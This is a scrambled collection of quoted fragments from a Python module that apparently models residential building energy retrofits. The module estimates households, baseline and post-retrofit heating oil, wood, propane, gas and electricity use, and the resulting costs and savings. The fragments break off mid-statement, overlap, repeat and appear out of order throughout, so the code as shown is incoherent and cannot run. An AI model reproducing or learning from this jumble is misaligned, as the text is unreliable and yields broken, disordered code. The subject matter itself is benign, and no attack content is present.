1", "self.init_HF = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 percent_accounted +=", "a community diagnostics : diagnostics, optional diagnostics for tracking error/warning messages prerequisites :", "a house. Attributes ---------- avg_kWh_consumption_per_HH : float average electric consumption per household (kWh/year).", "scalers, optional Scalers to adjust normal run variables. 
See note on accepted scalers", "self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0", "* self.avg_kWh_consumption_per_HH * \\ constants.kWh_to_mmbtu return np.float64(fuel_amnt * (total_consumption - HH_consumption) * cf)", "if self.cd[\"model financial\"]: HF_price = (self.diesel_prices + self.cd['heating fuel premium']) wood_price = self.cd['cordwood", "the total fuel saved in gallons \"\"\" base_heat = \\ self.baseline_HF_consumption[:self.actual_project_life] post_heat =", "proposed_fuel_wood_consumption : np.array proposed cordwood consumption proposed_fuel_LP_consumption : np.array proposed LP consumption proposed_fuel_gas_consumption", "Consumption Baseline\": b_LP, \"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\": r_LP, \"Residential: Heating", "self.comp_specs['average refit cost'] * \\ community_data.get_item( 'community', 'regional construction multiplier' ) self.set_project_life_details( self.comp_specs[\"start", "baseline cost of electricity per year \"\"\" self.cd[\"electric prices\"].index = \\ self.cd[\"electric prices\"].index.astype(int)", "see information on Diagnostics Object \"\"\" def __init__ (self, community_data, forecast, diag =", "r_elec_cost b_LP = self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP r_LP = self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP s_LP = b_LP - r_LP b_LP_cost", "\"Residential: Heating Biomass (cords/year) Consumption Savings\": s_bio, \"Residential: Heating Biomass (cords/year) Cost Baseline\":", "self.baseline_fuel_kWh_consumption * gas_price # coal,solar, other def calc_baseline_kWh_cost (self): \"\"\"calculate baseline electricity costs", "Consumption Savings\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\", \"Residential: Heating Natural Gas", "(cords/year) Consumption Savings\": s_bio, \"Residential: Heating Biomass (cords/year) Cost Baseline\": 
b_bio_cost, \"Residential: Heating", "output csv in directory Parameters ---------- directory : path output directory \"\"\" if", "monthly consumption of electricity for a house. Attributes ---------- avg_kWh_consumption_per_HH : float average", "initial propane consumption init_kWh : float initial electric consumption \"\"\" rd = self.comp_specs['data']", "\"Residential: Heating Fuel All (MMBtu/year) Cost Savings\": self.get_heating_savings_costs(), \"Residential: Heating Oil (gallons/year) Consumption", "forecast, diag = None, prerequisites = {}): \"\"\"Class initialiser Parameters ---------- community_data :", "np.float64(rd[\"Fuel Oil\"]) / 100.0 self.savings_HF = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total,", "HH * self.avg_kWh_consumption_per_HH * \\ constants.kWh_to_mmbtu return np.float64(fuel_amnt * (total_consumption - HH_consumption) *", "project for this component to run. Parameters ---------- scalers : dictionary of valid", "df[[ \"Residential: Heating Oil (gallons/year) Consumption Baseline\", \"Residential: Heating Oil (gallons/year) Consumption Post", "Savings\", \"Residential: Heating Biomass (cords/year) Consumption Baseline\", \"Residential: Heating Biomass (cords/year) Consumption Post", "Biomass (cords/year) Consumption Baseline\": b_bio, \"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\": r_bio,", "a community. 
Initial value: 'Residential Buildings' section of community_data See also -------- aaem.community_data", "baseline_fuel_gas_consumption : np.array baseline natural gas consumption baseline_fuel_LP_consumption : np.array baseline propane consumption", "Attributes ---------- proposed_kWh_cost: np.array proposed electricity cost \"\"\" kWh_cost = self.cd[\"electric prices\"].\\ ix[self.start_year:self.end_year]", "self.baseline_fuel_gas_consumption = self.init_gas + \\ np.float64(rd[\"Utility Gas\"]/100.0) * \\ scaler * constants.mmbtu_to_Mcf self.baseline_fuel_LP_consumption", "= (self.diesel_prices + self.cd['heating fuel premium']) wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year:", "community_data.copies.\\ #~ ix[\"yearly electric summary\"].values[0] if self.cd[\"model electricity\"]: self.elec_prices = community_data.get_item('community', 'electric prices')", "------------------------------------- \"\"\" import numpy as np from pandas import DataFrame import os from", "HH_consumption) * cf) def calc_baseline_fuel_consumption (self): \"\"\"Calculate baseline fuel consumption Attributes: baseline_fuel_Hoil_consumption :", "float the total fuel saved in gallons \"\"\" base_heat = \\ self.baseline_HF_consumption[:self.actual_project_life] post_heat", "self.proposed_fuel_gas_consumption = \\ self.baseline_fuel_gas_consumption - self.savings_gas self.proposed_fuel_kWh_consumption = \\ self.baseline_fuel_kWh_consumption - self.savings_kWh self.proposed_HF_consumption", "Oil (gallons/year) Cost Savings\": s_oil_cost, \"Residential: Heating Biomass (cords/year) Consumption Baseline\": b_bio, \"Residential:", "rate'], self.cd['current year']) self.calc_levelized_costs(0) def get_fuel_total_saved (self): \"\"\"Get total fuel saved. 
Returns -------", "price'] elec_price = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] LP_price = self.cd['propane price'] gas_price = self.cd['natural", "return # needed for electric or HF component and has a default value", "\"\"\" def __init__ (self, community_data, forecast, diag = None, prerequisites = {}): \"\"\"Class", "Propane (gallons/year) Cost Savings\": s_LP_cost, \"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\": b_NG,", "= np.float64(rd[\"Wood\"]) / 100.0 self.savings_wood = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total,", "gas_price + \\ self.baseline_fuel_LP_consumption * LP_price + \\ self.baseline_fuel_kWh_consumption * gas_price # coal,solar,", "self.refit_cost_rate = \\ self.comp_specs['average refit cost'] * \\ community_data.get_item( 'community', 'regional construction multiplier'", "self.cd['heating fuel premium']) wood_price = self.cd['cordwood price'] elec_price = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] LP_price", "* (1/constants.mmbtu_to_gal_LP) def calc_baseline_kWh_consumption (self): \"\"\"Calculate the baseline kWh consumption for a community", "\\ self.proposed_HF_consumption[:self.actual_project_life] return (base_heat - post_heat) * constants.mmbtu_to_gal_HF def get_total_energy_produced (self): \"\"\"Get total", "import DataFrame import os from aaem.components.annual_savings import AnnualSavings from aaem.community_data import CommunityData from", "cost of heating fuels per year \"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel", "community_data.get_item('community', 'electric prices') self.comp_specs = community_data.get_section(COMPONENT_NAME) self.component_name = COMPONENT_NAME self.forecast = forecast self.refit_cost_rate", "\\ self.proposed_fuel_kWh_consumption * gas_price def calc_proposed_kWh_cost (self): \"\"\"Calculate post retrofit electricity costs Attributes", "= self.savings_HF 
* (1/constants.mmbtu_to_gal_HF) +\\ self.savings_wood * (1/constants.mmbtu_to_cords) +\\ self.savings_gas * (1/constants.mmbtu_to_Mcf) +\\", "gas_price = self.cd['natural gas price'] self.baseline_HF_cost = \\ self.baseline_fuel_Hoil_consumption * HF_price + \\", "(gallons/year) Cost Baseline\": b_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Post Retrofit\": r_LP_cost, \"Residential:", "Cost Baseline\": b_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Post Retrofit\": r_elec_cost, \"Residential: Electric", "Cost Baseline\": b_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Post Retrofit\": r_bio_cost, \"Residential: Heating", "to \"+ str(con_threshold)+\" kWh per year\")) self.avg_kWh_consumption_per_HH = avg_con self.diagnostics.add_note(self.component_name, \"Average consumption was", "/ 100.0 self.savings_kWh = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_kWh)", "self.component_name = COMPONENT_NAME self.forecast = forecast self.refit_cost_rate = \\ self.comp_specs['average refit cost'] *", "electric consumption per household (kWh/year). >= 6000 \"\"\" # 500 average energy use,", "self.baseline_HF_consumption = \\ self.baseline_fuel_Hoil_consumption * \\ (1/constants.mmbtu_to_gal_HF) +\\ self.baseline_fuel_wood_consumption * \\ (1/constants.mmbtu_to_cords) +\\", "All (MMBtu/year) Cost Baseline\": self.get_base_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost Post Retrofit\":", "\"\"\"Get the average monthly consumption of electricity for a house. 
Attributes ---------- avg_kWh_consumption_per_HH", "if self.cd[\"model heating fuel\"]: #~ self.calc_init_HH() self.calc_savings_opportunities() self.calc_init_consumption() self.calc_baseline_fuel_consumption() self.calc_proposed_fuel_consumption() #~ self.set_forecast_columns() if", "in propane consumption savings_kWh : float savings in electric consumption savings_mmbtu: float total", "/ \\ self.comp_specs['data']['Total Occupied'] households = np.round(self.forecast.population / np.float64(peps_per_house)) households.columns = [\"HH\"] self.households", "amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 self.savings_gas = avg_EUI_reduction * self.opportunity_HH * \\", "int(self.forecast.population.ix[yr])#.values[0][0] peps_per_house = float(self.base_pop) / \\ self.comp_specs['data']['Total Occupied'] households = np.round(self.forecast.population / np.float64(peps_per_house))", "LP_price + \\ self.baseline_fuel_kWh_consumption * gas_price # coal,solar, other def calc_baseline_kWh_cost (self): \"\"\"calculate", "- self.savings_gas self.proposed_fuel_kWh_consumption = \\ self.baseline_fuel_kWh_consumption - self.savings_kWh self.proposed_HF_consumption = \\ self.baseline_HF_consumption -", "proposed_kWh_consumption : np.array set to baseline values \"\"\" self.proposed_kWh_consumption = self.baseline_kWh_consumption def calc_proposed_fuel_cost", "self.cd['propane price'] gas_price = self.cd['natural gas price'] else: HF_price = np.nan wood_price =", "self.proposed_HF_consumption[:self.actual_project_life] def calc_avg_consumption (self): \"\"\"Get the average monthly consumption of electricity for a", "Cost Baseline\", \"Residential: Electric Heat (kWh/year) Cost Post Retrofit\", \"Residential: Electric Heat (kWh/year)", "s_elec_cost = b_elec_cost - r_elec_cost b_LP = self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP r_LP = self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP s_LP =", "def calc_savings_opportunities (self): \"\"\"Calculate savings 
opportunities Attributes ---------- opportunity_HH : int Houses that", "= self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 percent_accounted +=", "energy produced. Returns ------- float the total energy produced \"\"\" # no electric", "float initial heating cordwood consumption init_gas : float initial natural gas fuel consumption", "Savings\", \"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\", \"Residential: Heating Fuel All (MMBtu/year)", "self.opportunity_HH if self.opportunity_HH < 0: self.opportunity_HH = 0 self.diagnostics.add_note(self.component_name, \"calculate Houses to retrofit", "values \"\"\" self.proposed_kWh_consumption = self.baseline_kWh_consumption def calc_proposed_fuel_cost (self): \"\"\"Calculate proposed heating cost Attributes", "each of these function calls is an identity amnt = np.float64(rd[\"Fuel Oil\"]) /", "($) \"\"\" self.capital_costs = self.opportunity_HH * self.refit_cost_rate def calc_annual_electric_savings (self): \"\"\"calculate annual electric", "---------- diagnostics : diagnostics for tracking error/warning messages initial value: diag or new", "def calc_baseline_kWh_cost (self): \"\"\"calculate baseline electricity costs Attributes ---------- baseline_kWh_cost : np.array baseline", "self.calc_baseline_fuel_consumption() self.calc_proposed_fuel_consumption() #~ self.set_forecast_columns() if self.cd[\"model financial\"]: self.calc_capital_costs() self.get_diesel_prices() self.calc_baseline_fuel_cost() self.calc_proposed_fuel_cost() self.calc_baseline_kWh_cost() self.calc_proposed_kWh_cost()", "\"\"\" self.diagnostics = diag if self.diagnostics == None: self.diagnostics = diagnostics() self.intertie_data =", "a percentage of the pre-retrofit consumption, and the forecasted price of offset heating", "* constants.mmbtu_to_cords self.baseline_fuel_gas_consumption = self.init_gas + \\ np.float64(rd[\"Utility Gas\"]/100.0) * \\ scaler *", "Attributes 
---------- baseline_HF_cost : np.array baseline cost of heating fuels per year \"\"\"", "(gallons/year) Consumption Post Retrofit\": r_LP, \"Residential: Heating Propane (gallons/year) Consumption Savings\": s_LP, \"Residential:", "Baseline\", \"Residential: Heating Propane (gallons/year) Cost Post Retrofit\", \"Residential: Heating Propane (gallons/year) Cost", "amnt = np.float64(rd[\"LP\"]) / 100.0 percent_accounted += amnt self.init_LP = self.calc_consumption_by_fuel(amnt, total, HH,", "\"Not a residential project.\" return # needed for electric or HF component and", "self.set_forecast_columns() if self.cd[\"model financial\"]: self.calc_capital_costs() self.get_diesel_prices() self.calc_baseline_fuel_cost() self.calc_proposed_fuel_cost() self.calc_baseline_kWh_cost() self.calc_proposed_kWh_cost() self.calc_annual_electric_savings() self.calc_annual_heating_savings() self.calc_annual_total_savings()", "of houses cf: float conversion factor Returns ------- float: fuel consumed for a", "All (MMBtu/year) Cost Post Retrofit\": self.get_proposed_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost Savings\":", "np.float64(rd[\"Fuel Oil\"]) / 100.0 percent_accounted += amnt self.init_HF = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_HF)", "Gas\"]) / 100.0 self.savings_gas = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1,", "output directory \"\"\" if not self.was_run: return if self.cd[\"model financial\"]: HF_price = (self.diesel_prices", "- r_LP b_LP_cost = self.baseline_fuel_LP_consumption * LP_price r_LP_cost = self.proposed_fuel_LP_consumption * LP_price s_LP_cost", "b_oil_cost - r_oil_cost b_bio = self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords r_bio = self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords s_bio = b_bio -", "for the first year of the project Attributes ---------- init_HH : int estimated", "np.array(range(self.project_life)) + self.start_year df = 
DataFrame({ \"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\":", "Consumption Baseline\", \"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\", \"Residential: Heating Propane (gallons/year)", "fuel \"\"\" HH_consumption = HH * self.avg_kWh_consumption_per_HH * \\ constants.kWh_to_mmbtu return np.float64(fuel_amnt *", "price'] gas_price = self.cd['natural gas price'] self.proposed_HF_cost = \\ self.proposed_fuel_Hoil_consumption * HF_price +", "+ str(yr)) def calc_init_HH (self): \"\"\"Estimate the # of households for the first", "* cf) def calc_baseline_fuel_consumption (self): \"\"\"Calculate baseline fuel consumption Attributes: baseline_fuel_Hoil_consumption : np.array", "elec_price = np.nan LP_price = np.nan gas_price = np.nan b_oil = self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF r_oil", "Heating Natural Gas (Mcf/year) Cost Savings\", \"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\",", "total, HH, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 percent_accounted += amnt self.init_kWh =", ": np.array proposed LP consumption proposed_fuel_gas_consumption : np.array proposed natural gas consumption proposed_fuel_kWh_consumption", "/ 100.0 HH = self.households #~ print HH area = np.float64(rd[\"Pre-Retrofit Avg Area", "peps_per_house = float(self.base_pop) / \\ self.comp_specs['data']['Total Occupied'] households = np.round(self.forecast.population / np.float64(peps_per_house)) households.columns", "LP_price + \\ self.proposed_fuel_kWh_consumption * gas_price def calc_proposed_kWh_cost (self): \"\"\"Calculate post retrofit electricity", "costs':1.0}): \"\"\"Runs the component. 
The Annual Total Savings,Annual Costs, Annual Net Benefit, NPV", "\"heating_fuel_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [cords/year]\", years, self.baseline_fuel_wood_consumption) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [mmbtu/year]\", years,", "fuel costs \"\"\" self.annual_electric_savings = np.zeros(self.project_life) def calc_annual_heating_savings (self): \"\"\"calculate annual heating savings", "Electric Heat (kWh/year) Cost Post Retrofit\": r_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Savings\":", "s_NG = b_NG - r_NG b_NG_cost = self.baseline_fuel_gas_consumption * gas_price r_NG_cost = self.proposed_fuel_gas_consumption", "fuel consumption Attributes: baseline_fuel_Hoil_consumption : np.array baseline heating fuel consumption baseline_fuel_wood_consumption : np.array", "module, see information on Forecast Object aaem.diagnostics : diagnostics module, see information on", "\\ self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\ scaler * constants.mmbtu_to_cords self.baseline_fuel_gas_consumption = self.init_gas + \\ np.float64(rd[\"Utility Gas\"]/100.0) *", "amnt = np.float64(rd[\"LP\"]) / 100.0 self.savings_LP = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt,", "def calc_proposed_kWh_consumption (self): \"\"\"calculate the proposed kWh consumption for a community Attributes ----------", ": dictionary of components, optional prerequisite component data \"\"\" self.diagnostics = diag if", "forecast community forecast for estimating future values initial value: forecast cd : dictionary", "int(self.comp_specs['data']['Year']) self.base_pop = int(self.forecast.population.ix[yr])#.values[0][0] peps_per_house = float(self.base_pop) / \\ self.comp_specs['data']['Total Occupied'] households =", "from pandas import DataFrame import os from 
aaem.components.annual_savings import AnnualSavings from aaem.community_data import", "run (self, scalers = {'capital costs':1.0}): \"\"\"Runs the component. The Annual Total Savings,Annual", "initialiser Parameters ---------- community_data : CommunityData CommunityData Object for a community forecast :", "self.baseline_fuel_solar_consumption #~ self.baseline_fuel_other_consumption if self.cd['natural gas price'] == 0: self.baseline_fuel_gas_consumption = 0 self.baseline_HF_consumption", "of improvements ($) \"\"\" self.capital_costs = self.opportunity_HH * self.refit_cost_rate def calc_annual_electric_savings (self): \"\"\"calculate", "data \"\"\" self.diagnostics = diag if self.diagnostics == None: self.diagnostics = diagnostics() self.intertie_data", "year']) self.calc_levelized_costs(0) def get_fuel_total_saved (self): \"\"\"Get total fuel saved. Returns ------- float the", "if not self.was_run: return if self.cd[\"model financial\"]: HF_price = (self.diesel_prices + self.cd['heating fuel", "Attributes ---------- annual_heating_savings : np.array heating savings ($/year) \"\"\" self.annual_heating_savings = self.baseline_HF_cost -", "elec_price s_elec_cost = b_elec_cost - r_elec_cost b_LP = self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP r_LP = self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP s_LP", "print len(kWh_cost) self.baseline_kWh_cost = self.baseline_kWh_consumption * kWh_cost def calc_proposed_fuel_consumption (self): \"\"\"Calculate the proposed", "\" corrected to \"+ str(con_threshold)+\" kWh per year\")) self.avg_kWh_consumption_per_HH = avg_con self.diagnostics.add_note(self.component_name, \"Average", "id'].split('+') if len(tag) > 1 and tag[1] != 'residential': self.was_run = False self.reason", "consumption savings_mmbtu: float total savings in mmbtu \"\"\" rd = self.comp_specs['data'] ## #HH", "created by the project Attributes ---------- annual_electric_savings : np.array electric savings ($/year) are", "Retrofit\", 
\"Residential: Electric Heat (kWh/year) Cost Savings\", \"Residential: Heating Propane (gallons/year) Cost Baseline\",", "pop = self.forecast.base_pop self.init_HH = int(round(HH*(val / pop))) def calc_init_consumption (self): \"\"\"Calculate the", "Baseline\": b_LP, \"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\": r_LP, \"Residential: Heating Propane", "r_elec_cost = self.proposed_fuel_kWh_consumption * elec_price s_elec_cost = b_elec_cost - r_elec_cost b_LP = self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP", "constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 percent_accounted += amnt self.init_LP = self.calc_consumption_by_fuel(amnt, total,", "to retrofit was negative, setting to 0\" ) ## % as decimal #~", "Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Cost Savings\", \"Residential: Total Cost Savings", "Fuel All (MMBtu/year) Consumption Savings\": self.get_base_HF_use() -\\ self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year)", "proposed total electric consumption \"\"\" self.proposed_fuel_Hoil_consumption = \\ self.baseline_fuel_Hoil_consumption - self.savings_HF self.proposed_fuel_wood_consumption =", "r_LP_cost = self.proposed_fuel_LP_consumption * LP_price s_LP_cost = b_LP_cost - r_LP_cost b_NG = self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf", "\"Residential: Heating Natural Gas (Mcf/year) Cost Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year)", "avg_kWh_consumption_per_HH : float average electric consumption per household (kWh/year). 
>= 6000 \"\"\" #", "(MMBtu/sf)\"] * self.opportunity_HH #~ self.baseline_total_energy_consumption = total HH = self.init_HH percent_accounted = 0", "prerequisite component data \"\"\" self.diagnostics = diag if self.diagnostics == None: self.diagnostics =", "Natural Gas (Mcf/year) Cost Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Cost Savings\",", "Consumption Baseline\": b_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption Post Retrofit\": r_NG, \"Residential:", "self.cd['heating fuel premium']) wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price =", "calc_annual_electric_savings (self): \"\"\"calculate annual electric savings created by the project Attributes ---------- annual_electric_savings", "\"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Cost", "self.cd['propane price'] gas_price = self.cd['natural gas price'] self.baseline_HF_cost = \\ self.baseline_fuel_Hoil_consumption * HF_price", "percent_accounted += amnt self.init_gas = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) /", "\"\"\"Get total energy produced. Returns ------- float the total energy produced \"\"\" #", "(kWh/year) Cost Savings\", \"Residential: Heating Propane (gallons/year) Cost Baseline\", \"Residential: Heating Propane (gallons/year)", "\"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\": b_NG_cost, \"Residential: Heating Natural Gas (Mcf/year)", "Savings\": s_LP_cost, \"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\": b_NG, \"Residential: Heating Natural", "Return will all be calculated. 
There must be a known Heat Recovery project", "np.array proposed electricity cost \"\"\" kWh_cost = self.cd[\"electric prices\"].\\ ix[self.start_year:self.end_year] kWh_cost = kWh_cost.T.values[0]", ": path output directory \"\"\" if not self.was_run: return if self.cd[\"model financial\"]: HF_price", "- r_oil b_oil_cost = self.baseline_fuel_Hoil_consumption * HF_price r_oil_cost = self.proposed_fuel_Hoil_consumption * HF_price s_oil_cost", "NPV Costs, NPV Net Benefits, Benefit-Cost Ratio, Levelized Cost of Energy, and Internal", "for residential buildings HH : float a # of houses cf: float conversion", "# no electric return self.baseline_HF_consumption[:self.actual_project_life] - \\ self.proposed_HF_consumption[:self.actual_project_life] def calc_avg_consumption (self): \"\"\"Get the", "each fuel type. Attributes ---------- init_HF : float initial heating oil consumption init_wood", "future values initial value: forecast cd : dictionary general data for a community.", "heating oil consumption proposed_fuel_wood_consumption : np.array proposed cordwood consumption proposed_fuel_LP_consumption : np.array proposed", "from aaem.components.annual_savings import AnnualSavings from aaem.community_data import CommunityData from aaem.forecast import Forecast from", "Baseline\", \"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\", \"Residential: Heating Propane (gallons/year) Consumption", "self.init_kWh+\\ np.float64(rd[\"Electricity\"]/100.0)*\\ scaler * constants.mmbtu_to_kWh #~ self.baseline_fuel_coal_consumption #~ self.baseline_fuel_solar_consumption #~ self.baseline_fuel_other_consumption if self.cd['natural", "\"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\", \"Residential: Heating Oil (gallons/year) Cost Baseline\",", "is also calculated. 
Parameters ---------- community_data : CommunityData CommunityData Object for a community", "Post Retrofit\", \"Residential: Heating Biomass (cords/year) Consumption Savings\", \"Residential: Electric Heat (kWh/year) Consumption", "(self): \"\"\"Get total energy produced. Returns ------- float the total energy produced \"\"\"", "Baseline\": b_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost Post Retrofit\": r_NG_cost, \"Residential: Heating", "baseline_fuel_Hoil_consumption : np.array baseline heating fuel consumption baseline_fuel_wood_consumption : np.array baseline cordwood consumption", "(kWh/year) Cost Post Retrofit\": r_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Savings\": s_elec_cost, \"Residential:", "the pre-retrofit consumption, and the forecasted price of offset heating fuels. The cost", "Buildings' section of community_data See also -------- aaem.community_data : community data module, see", ": string lists reason for failure if run == False Notes ----- Accepted", "for a house. Attributes ---------- avg_kWh_consumption_per_HH : float average electric consumption per household", "cordwood consumption baseline_fuel_gas_consumption : np.array baseline natural gas consumption baseline_fuel_LP_consumption : np.array baseline", "#~ ix[\"yearly electric summary\"].values[0] if self.cd[\"model electricity\"]: self.elec_prices = community_data.get_item('community', 'electric prices') self.comp_specs", "optional diagnostics for tracking error/warning messages prerequisites : dictionary of components, optional prerequisite", "= self.baseline_HF_cost - \\ self.proposed_HF_cost def set_forecast_columns (self): \"\"\"Set columns in the the", "of electricity for a house. 
Attributes ---------- avg_kWh_consumption_per_HH : float average electric consumption", "other def calc_proposed_kWh_consumption (self): \"\"\"calculate the proposed kWh consumption for a community Attributes", "post_heat = \\ self.proposed_HF_consumption[:self.actual_project_life] return (base_heat - post_heat) * constants.mmbtu_to_gal_HF def get_total_energy_produced (self):", "np.float64(rd[\"Utility Gas\"]) / 100.0 self.savings_gas = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total,", "* gas_price def calc_proposed_kWh_cost (self): \"\"\"Calculate post retrofit electricity costs Attributes ---------- proposed_kWh_cost:", "Heat (kWh/year) Cost Baseline\": b_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Post Retrofit\": r_elec_cost,", "(cords/year) Consumption Post Retrofit\", \"Residential: Heating Biomass (cords/year) Consumption Savings\", \"Residential: Electric Heat", "self.proposed_fuel_Hoil_consumption = \\ self.baseline_fuel_Hoil_consumption - self.savings_HF self.proposed_fuel_wood_consumption = \\ self.baseline_fuel_wood_consumption - self.savings_wood self.proposed_fuel_LP_consumption", "Cost Savings\", \"Residential: Electric Heat (kWh/year) Cost Baseline\", \"Residential: Electric Heat (kWh/year) Cost", "---------- run : bool True in the component runs to completion, False otherwise", "msg = str(round(percent_accounted)) + \\ \" of residential fuel sources accounted for\" self.diagnostics.add_note(self.component_name,", "% of fuel used total_consumption : float total consumption for residential buildings HH", "Post Retrofit\": r_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\": s_NG, \"Residential: Heating", "consumption savings_kWh : float savings in electric consumption savings_mmbtu: float total savings in", "consumed for a type of fuel \"\"\" HH_consumption = HH * self.avg_kWh_consumption_per_HH *", "Heating Biomass (cords/year) Cost Baseline\", \"Residential: Heating Biomass 
(cords/year) Cost Post Retrofit\", \"Residential:", "(gallons/year) Cost Baseline\", \"Residential: Heating Propane (gallons/year) Cost Post Retrofit\", \"Residential: Heating Propane", "Net Benefits, Benefit-Cost Ratio, Levelized Cost of Energy, and Internal Rate of Return", "section of community_data comp_specs : dictionary component specific data for a community. Initial", "of these function calls is an identity amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0", "rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"] * self.opportunity_HH #~ self.baseline_total_energy_consumption = total HH = self.init_HH", "natural gas consumption proposed_fuel_kWh_consumption : np.array proposed electric consumption proposed_HF_consumption : np.array proposed", "house'] #~ self.avg_monthly_consumption = ave_con/12 if (avg_con < con_threshold) or np.isnan(avg_con): avg_con =", "- self.init_HH) * area * EUI self.baseline_fuel_Hoil_consumption = \\ self.init_HF+np.float64(rd[\"Fuel Oil\"]/100.0)*\\ scaler *", "total, 1, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 self.savings_gas = avg_EUI_reduction *", "Biomass (cords/year) Cost Post Retrofit\", \"Residential: Heating Biomass (cords/year) Cost Savings\", \"Residential: Electric", "= {'capital costs':1.0}): \"\"\"Runs the component. 
The Annual Total Savings,Annual Costs, Annual Net", "= households.ix[self.start_year:self.end_year].T.values[0] val = self.forecast.get_population(self.start_year) HH =self.comp_specs['data']['Total Occupied'] self.init_HH = int(round(HH*(val / self.base_pop)))", "wood_price = self.cd['cordwood price'] elec_price = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] LP_price = self.cd['propane price']", "\"Residential: Electric Heat (kWh/year) Consumption Baseline\": b_elec, \"Residential: Electric Heat (kWh/year) Consumption Post", "percent_accounted += amnt self.init_HF = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) /", "Heating Natural Gas (Mcf/year) Consumption Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Consumption", "## total consumption total = rd[\"Total Consumption (MMBtu)\"] + \\ rd[\"BEES Total Consumption", "consumption init_wood : float initial heating cordwood consumption init_gas : float initial natural", "Attributes ---------- avg_kWh_consumption_per_HH : float average electric consumption per household (kWh/year). 
